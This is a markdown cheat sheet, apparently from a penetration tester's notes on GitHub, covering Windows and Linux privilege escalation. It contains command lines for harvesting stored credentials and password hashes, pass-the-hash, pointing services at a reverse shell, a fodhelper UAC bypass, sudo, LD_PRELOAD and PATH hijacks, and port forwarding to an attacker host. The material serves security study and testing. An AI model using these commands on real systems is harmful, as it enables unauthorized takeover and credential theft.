Skip to content

Latest commit

 

History

History
691 lines (582 loc) · 38.6 KB

privilege-escalation.md

File metadata and controls

691 lines (582 loc) · 38.6 KB
description
Shellin's for show, Rootin's for dough

Privilege Escalation

General Privilege Escalation Guides

{% hint style="info" %} Dont forget to to try any harvested credentials! {% endhint %}

Windows Privilege Escalation

{% tabs %} {% tab title="Guides and Reference" %}

{% tab title="Methodology" %}

Basics

  • Goal: Gain a shell as Administrator or SYSTEM
  • SYSTEM is a default service account with the highest level of priv
  • Resources - access/action set by ACL
    • Each ACL is made up of ACEs: relationship between an object/user, and a right.
  • Administrator Shells
    • Easy way: msfvenom
    • Admin-> SYSTEM use PSEXEC

Enumeration for PrivEsc

  • Check Whoami and net user [user]
  • Check for easy unpatched vulnerabilities
>wmic qfe get Caption,Description,HotFixID,InstalledOn

  • Run winPEAS

    • > reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 (enables colors on command prompt)

  • Run Seatbelt

    • .\Seatbelt.exe all

  • Check for

    • Ability to odify a service
    • Ability to start/stop service
    • Interesting files that might contain creds

  • Try Payload all the things enumeration commands

    • Create checklist of the things tyou need to make an exploit work

Order of Techniques

  • Registry and service exploits first
  • Kernel exploits last {% endtab %}

{% tab title="PrivEsc Tools" %}

  • WinPEAS (The Go-To) - These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.
  • SeatBelt - Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
  • Windows Exploit Suggester Next Gen - WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.
  • Sherlock and Watson - look for missing patches and KBs
  • Accesschk.exe with the accept EULA flag - a Microsoft Sysinternals tool that is great for auditing privileges on your systems, and for auditing privileges on others’ systems. This version is a standalone utiltility with the older code that allows you to auto accept the EULA flag.
  • PrintSpoofer - From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
  • Rattler - Rattler is a tool that automates the identification of DLL's which can be used for DLL preloading attacks.
  • SharpImpersonation - A User Impersonation tool - via Token or Shellcode injection

{% tab title="Potato Exploits" %}

  • Rotten Potato - New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools. Leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges.
  • Juicy Potato - Upgraded and Weaponized verison of RottenPotatoNG
  • Sweet Potato - A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM
  • Rogue Potato - Just another Windows Local Privilege Escalation from Service Account to System.
  • RemotePotato0 - Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
  • MultiPotato - This is just another Potato to get SYSTEM via SeImpersonate privileges.
  • Hot Potato
    • Attack that uxses spoofing and NTLM relay to gain SYSTEM Priv
    • Tricks windows to authenticating as the SYSTEM user to a fake HTTP server with NTLM.
    • Potato.exe exploit code binary exists!!!
    • Dont forget to compile the code wiht your reverse shell details
  • DCOMPotato - Some Service DCOM Object and SeImpersonatePrivilege abuse.
  • Token Impersonation
    • Cannot log directly into service accounts
    • Rotten Potato - Service accounts to intercept SYSTEM ticket and use it to impersonate SYSTEM user
    • Service accounts
      • Generally configured with SeImpersonate/SeAssignPrimaryToken privileges
      • This allows the account to impersonare the access tokens of other users including SYSTEM
      • Any user with these privs can run teh toeken impersonation exploits found.
    • Juicy Potato - https://github.com/ohpe/juicy-potato
    • Rogue Potato - https://github.com/antonioCoco/RoguePotato
    • PrintSpoofer - https://github.com/itm4n/PrintSpoofer {% endtab %} {% endtabs %}

Stored Credentials

{% tabs %} {% tab title="Creds in Registry" %} Stored Creds in Registry

  • Seach the registry for keys and values that contain “password”
    • >reg query HKLM /f password /t REG_SZ /s
    • >reg query HKCU /f password /t REG_SZ /s
  • >.\winPEADany.exe quiet filesinfo userinfo
  • Query Autologins
    • >reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  • Query Putty sessions
    • >reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” /s
  • Spawn a shell with new credentials
    • #winexe -U ‘admin%password’ //[targetip] cmd.exe
    • #winexe -U ‘admin%password’ --system //[targetip] cmd.exe {% endtab %}

{% tab title="Saved Creds" %} Saved Creds

  • Windows allows users to save thier credentials to the system for use with the runas command
  • >.\winPEASany.exe quiet cmd windowscreds
  • >cmdkey /list
    • >run savecred.bat to refresh list of saved credentials
  • >runas /savecred /user:admin C;\reverse.exe {% endtab %}

{% tab title="Config Files" %} Config files

  • Some config files will store admin creds
  • Unattend.xml - for automated setup of windows
  • Search for filenames: sysprep.inf, unattended.xml, sysprep.xml
  • Recuresively search for files in the current dir with “pass” in the name, or ending in .config
    • > dir /s *pass* == *.config
  • Recuresively search for files in the current dir with “password” in the name, and end in .xml, .ini, or ,txt
    • > findstr /si password *.xml *.ini *.txt
  • >.\winPEASany.exe quiet cmd searchfast filesinfo {% endtab %}

{% tab title="SAM" %} SAM

  • This is where windows stores password hashes
  • They are encrypted with a key that can be found in a file named SYSTEM
  • If you can read both SAM and SYSTEM you can extract the hashes.
    • Located in C:\Windows\System32\config
    • These are locked while windows is running
    • Backups might exist in C:|windows\Repair or C:\Windows\System32\config\RegBack
  • pwdump tool - part of creddump7
  • Look at the NTLM hash - If the last section starts with “31d6c” this indicates the password is empty, or the accoutn is disabled.
  • Crack the admin user hash with hashcat {% endtab %}

{% tab title="Pass-The-Hash" %}

  • Passing the hash
    • Windows accepts hashes instead of passwords for a number of services.
    • We can use pth-winexe to spawn a command prompt using the admin users pw hash
    • #pth-winexe -U " [entire hash including LM hash] //[target] cmd.exe {% endtab %} {% endtabs %}

Service Exploits

{% tabs %} {% tab title="Enum Cmds" %} First lets get a list of services that are running on the target and thier permissions

  • >accesschk.exe -uwcqv *
  • >accesschk.exe -uwcqv “Authenticated Users” *
  • > Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
  • >sc.exe qc [name] -query service config
  • >sc.exe query [name] -query service status
  • >sc.exe config [name] [option]= [value] -modify config option of a service
  • >net start/stop [name] -start/stop a servic {% endtab %}

{% tab title="Insecure Properties" %} Insecure Service Properties

  • Each service has an ACL to define certain permissions
  • Check: you must be able to change a service AND stop/start the service
  • >.\winPEASany.exe quiet servicesinfo
  • Verify with accesschk
    • .\accesschk.exe /accepteula -uwcqv user [service]
  • >sc qc [service]
  • If you can change the service, try changing the BINARY_PATH_NAME to that over your reverse shell
    • >sc config [service] binpath= “\”C:\PrivEsc\reverse.exe\""
  • >net start [service] {% endtab %}

{% tab title="Unquoted Paths" %} Unquoted Service Paths

  • Executables in windows can be run without their extensions
  • Some executables take arguments separated by spaces
  • Look for paths with spaces and no quotes
  • Check permissions for the service
  • Check for write permissions for each directory in the binary path
  • Create a reverse shell executable and name it to the file that would be inserted into the unquoted path.
  • PTFM: Unquoted Service Paths - pg. 32 {% endtab %}

{% tab title="Insecure Exe" %} Insecure Service Executables

  • If the original service executable is modifiable, we can simply replace it with our reverse shell
  • Check for called files by services that are writable.
  • Double check that you can start/stop the service
  • Copy/overwite the reverse shell file on top of the weak file {% endtab %}

{% tab title="DLL Hijack" %} DLL Hijacking

Registry Exploits

{% tabs %} {% tab title="Weak Registry Permissions" %} Weak Registry Permissions

  • Registry stores entries for each service
  • Since entries can have ACL's, they can be mis-configured and modify a services config.
  • Locate a weak registry entry > verify permissions with accesschk
  • NT AUTHORITY\INTERACTIVE - user group that all users are apart of
  • Overwrite the image path value in the registry, so the called executable in the service, points to your reverse shell
    • >reg add HKLM\SYSTEM\CurrentControlSet\Services\[service] /v ImagePath -t REG_EXPAND_SZ /d C:\PrivEsc\Reverse.exe /f {% endtab %}

{% tab title="Autoruns" %} Autoruns are configed in the registry. If you can write to an Autorun executable, you may get priv esc on restart.

{% endtab %}

{% tab title="AlwaysInstallElevated" %} Windows Privilege Escalation (AlwaysInstallElevated)

  • MSI files are used to install apps. They run with the permissions of the user trying to install. You can run these with admin (elevated) privs. We can use this by creating a malicious MSI file containing a reverse shell
  • Check 2 registry settings. These must be present and enabled
    • HKLM\SOFTWARE\POLICIES\Microsoft\Windows\Installer
    • HKCU\SOFTWARE\POLICIES\Microsoft\Windows\Installer
  • >.\winPEASany.exe quiet windowscreds
  • > reg query HKCU\SOFTWARE\POLICIES\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Create a reverse shell in the .msi format
  • https://github/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/always_install_elevated.rb {% endtab %} {% endtabs %}

Other Exploits And Techniques

{% tabs %} {% tab title="Scheduled Tasks" %}

  • Admins can config tasks to run as other users or SYSTEM
  • List all tasks your current user can see
    • > schtassk /query /fo LIST /v
    • PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*} | ft TaskName,TaskPath,State
  • Check tasks and called files for when/if they are executed
    • >echo C:\reverse.exe >> [scheduled executable]
  • Schedule a task that runs everytime the system starts
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onstart
  • Schedule a task that runs when a user logs on.
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon
  • Schedule a taks that runs when the system is idle
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onidle /i [1-999]
  • Schedule a task that runs one
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc once /st {HH:MM}
  • Schedule a task that runs with system permissions
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon /ru System
  • Schedule a task that runs on a remote computer
    • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon /s [PC name] {% endtab %}

{% tab title="UAC Bypass" %}

  • fodhelper.exe attack
    • PTFM: UAC Bypass - pg. 33
    • This binary runs as high integrity on windows 10. We can leverage it to bypas UAC by the way it uses the Registry.
    • Run C:\Windows\System32\fodhelper.exe -> manage optional features -> inspect application manifest with sigcheck
    • > cd C:\Tools\privilege_escalation\SysinternalsSuite
    • > sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
    • next we look at fodhelper.exe while running procmon
    • Will generate a “NAME NOT FOUND” error and indicate an potential exploitable registry entry
    • fodhelper.exe attemtps to query HKCU:\Software\Classes\ms-settings\shell\open\command, which does not appear to exist
    • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
    • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
    • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
  • Via Event Viewer
    • PTFM: UAC Bypass - pg. 33j {% endtab %}

{% tab title="Kernel Exploits" %}

{% tab title="Misc" %}

Insecure GUI

Vulnerable Apps

Port Forwarding

  • Sometimes its easier to run code on kali but the target is only listening on an internal port
  • Enter Plink.exe
  • winexe port connects with port 445
  • Setup
    • /etc/ssh/sshd_config - make usre PermitRootLogin is set to Yes
    • #service ssh restart
  • >.\plink.exe root@[attackerIP] -r 445:127.0.0.1:445
    • Forward remote port to local port
  • Now we run winexe at our local port on the attacker box, and plink sends it to the target, posing as an internal port
    • #winexe _u ‘admin%password’ //127.0.0.1 cmd.exe {% endtab %} {% endtabs %}

Linux Privilege Escalation

{% tabs %} {% tab title="Guides and Reference" %}

{% tab title="PrivEsc Tools" %}

  • LinPEAS - These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.
  • LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
  • LSE - Linux Smart enumeration, Linux enumeration tools for pentesting and CTFs
  • Unix Privesc Check - Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases).
  • Linux Exploit Suggester 2 - Next-Generation Linux Kernel Exploit Suggester
  • SUDO Killer - Linux Privilege Escalation through SUDO abuse. {% endtab %}

{% tab title="Methodology" %}

  • Check user
  • Run enum scripts at increasing levels
  • Run manual commands
  • Check user home dir
    • /var/backup, /var/log, history files
  • Try quickest methods first
  • Check internal ports
  • Use Kernel exploits as a last resort {% endtab %} {% endtabs %}
Enumerate Permissions
  • Users
    • Accounts in /etc/passwd
    • password hashes in /etc/shadow
    • identified by a UID
    • root = UID 0
    • 3 types
      • Real - defined in /etc/passwd. who they actually are
      • Effective - when executing a process as another user, thier effective ID is set to that user's real ID.
        • Most Access Control decisions
        • whoami
      • Saved - used to ensure SUID processes can temporarily switch a user's effective ID back to thier Rreal ID and back again without losing track of the original effective ID
  • Groups
    • /etc/group
    • Primary and multiple secondary groups
    • Default primary group is same name as user account
  • Files/Dir
    • Have a single owner and a group
    • Permissions:read write execute
    • 3 permission sets: owner, group, and all others
  • Special permissions
    • setuid (SUID) bit - When set, files will get executed with privileges of the file owner
    • setgid (SGID) bit - When set on a file , files will get executed with the permissions of the file group
      • When set on a directory, files created in that directory will inherit the group of the directory itself
  • Viewing permission
    • #ls -l /file/path
    • First 10 characters are the permissions on the file
    • First character is the type: “-” for file, “d” for directory
    • SUID/SGID permissions are represented by an “s” in the execute position

Techniques

{% tabs %} {% tab title="Pwds and Keys" %}

  • Service PWs may be stored in plain text in config files
  • History files may contain a password used as part of a command
    • #ls -a -> look for _history files
  • Config files
    • opnevpn files -> auth-user-pass option
  • SSH Keys - can be used in leu of passwords {% endtab %}

{% tab title="Weak File Permissions" %}

  • /etc/shadow
    • Readable - copy and crack the Root user hash
    • writeable - copy and edit the shadow file with new root password
  • /etc/passwd
    • For backwards compatibility, if the second field of a user row is a passwrod hash, it takes precedent over /etc/shadow
    • Either replace the password for root, or append a new user with root permissions.
    • Delete the x in the second field reads as if there is no password for user
  • Backups
    • Some can be readable to gather interesting files {% endtab %}

{% tab title="Sudo Abuse" %}

  • Rules in /etc/sudoers
  • Useful commands
    • #sudo -u <username> <program>
    • # sudo -l (show what you can run)
    • @ sudo -s
    • #sudo -i
    • #sudo /bin/bash
    • #sudo passwd
  • Shell escape sequences
  • Abusing intended functionality
    • Read/write to files owned by root
    • EX apache2 - it will try to read the first line of any file passed as an arguement.
      • #sudo apache2 -f /etc/shadow
  • Environment variables
    • Programs run through sudo can inherit the environment variables from the user's environment
    • In the /etc/sudoers file, The options env_reset and env_keep options are available. These are displayed wiht #sudo -l
    • LD_PRELOAD variable that can be set to the path of a shared object file (.so)
      • By creating a custom shared object and an init() funciton, we can execute code as soon as the object is loaded
      • Will not work if real userID is different from effectiveID. ALso, sudo must have env_keep option
      • #sudo LD_PRELOAD=<path to created shared object> <command you can run as sudo>
    • LD_LIBRARY_PATH
      • set of directories where shared libraries are searched for first
      • Print shared libraries uxsed by a program
        • #ldd /usr/sbin/apache2
      • By creating a shared library wiht the same name as one used by a program, and setting the LD_LIBRARY_PATH to its parent dir, the program will load our shared library instead.
  • Sudo Caching
    • PTFM: Sudo Caching - pg. 93 {% endtab %}

{% tab title="Cron Jobs" %}

  • Run at the security level of the user that owns them
  • Default run with /bin/sh with limited envi variables
  • Cron table files (crontabs) store config for cron jobs
  • Cronjobs are located in /var/spool/cron/ or /var/spool/cron/crontabs/
  • System wide crontab is located in /etc/crontab
  • If we can write to a program or script that gets run with a cronjob, we can replate it with our own code
  • PATH envi variable
    • default set to /usr/bin
    • Can be overwritten in the crontab file
    • If a cronjob script/program does nto use absolute path and one of the path dir is user writeable, you can create a program or script with the same name as the cronjob
  • Wildcard
    • When a wildcard char (*) is provided to a command as par tof an arguement, the shell will first perform filename expansion (globbing) on the wildcard
    • this process replaces the wildcard with a speace-separated list of the file and directory names in the current directory
    • Can create filenames that match cmd line options like “--help” {% endtab %}

{% tab title="Service Exploits" %}

  • #ps aux | grep “^root” Show all processes runnign as root
  • #netstat -nl Show all actice connections (look for services)
  • Try to ID verison number and research for exploits
    • #<program> -v or --version show version number
    • #dpkg -l | grep <program>
    • #rpm -qa | grep <program>
  • Some processes running as root may be bound to an internal port through which it communicates
    • If it cannot be run locally on the target machine, the port can be forwarded using ssh to your local machine
    • $ssh -R <local port>:127.0.0.1:<service-port> <username>@<local-machine>
    • Run netstat to see what services are listening to 127.0.0.1:<port>, then use port forwarding to send to the target port {% endtab %} {% endtabs %}
SUID/SGID Executables
  • Find files with the SUID/SGID bit set
    • #find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec la -l {} \; 2> /dev/null
    • Can use shell escape sequences on SUID/SGID files
    • PTFM: BSUID and SGID - pg. 93
  • Known Exploits - certain programs use SUID files as part of thier process or install.
    • Search for these! Look for exim!
  • Shared Object Injection
    • Use strace to track system calls from a program to any shared objects it is trying to call
    • If we can write to the location, we cna create an object that will run wiht the program
    • Create a c file that creates a file
    • Compile the c file
      • >gcc
  • PATH envi variable
    • If a program tries to execute another by only using the program and and not the absolute path, we can tell the shell where to look
    • Finding vulnerbable programs
      • Those sub-secuted files are often mentioned as a string in the program.
      • Run strings on the host executable
      • Can also use strace or ltrace
      • #strace -v -f -e execve <command> 2>&1 | grep exec
      • Attack
        • Create new shell executable names the sub-executed service
        • Set the path varibale to the path of the newly created executable
        • #PATH=.:$PATH <host file to execute>
  • Abusing shell features
    • Older versions <4.2-048 can define user functions with an absolute path name
      • These can be exported and can take precedence over the actual executable being called
      • #function <service oyu want to impersonate> { /bin/bash -p; )
      • #export -f /user/sbin/service
    • Debugging mode which can be enabled with the -x command or by modifying SHELLOPTS to inclide xtrace
      • SHELLOPTS is read only, but the env command allows SHELLOPS to be set
      • When in debugging mode, Bash uses the env var PS4 to display an extra prompt for debug statements. This variebl can contain embedded commands
      • If an SUID file runs another via bash, those envi variables can be enherited.
      • This does not work on bash past 4.4

{% tabs %} {% tab title="NFS" %}

  • Shares configed under /etc/exports
    • created files inherit remote users UID and GUID even if they do not have an account locally
  • Commands
    • # showmount -e [target]
    • # nmap -sV -script=nfs-showmount [target]
    • #mount -o rw,vers=2 [target]:[share] [local dir]
  • Linux Privilege Escalation using Misconfigured NFS {% endtab %}

{% tab title="Kernel exploits" %}

{% tab title="Misc" %}

Specific Vulnerabilities

CVE-2021-36934 - HiveNightmare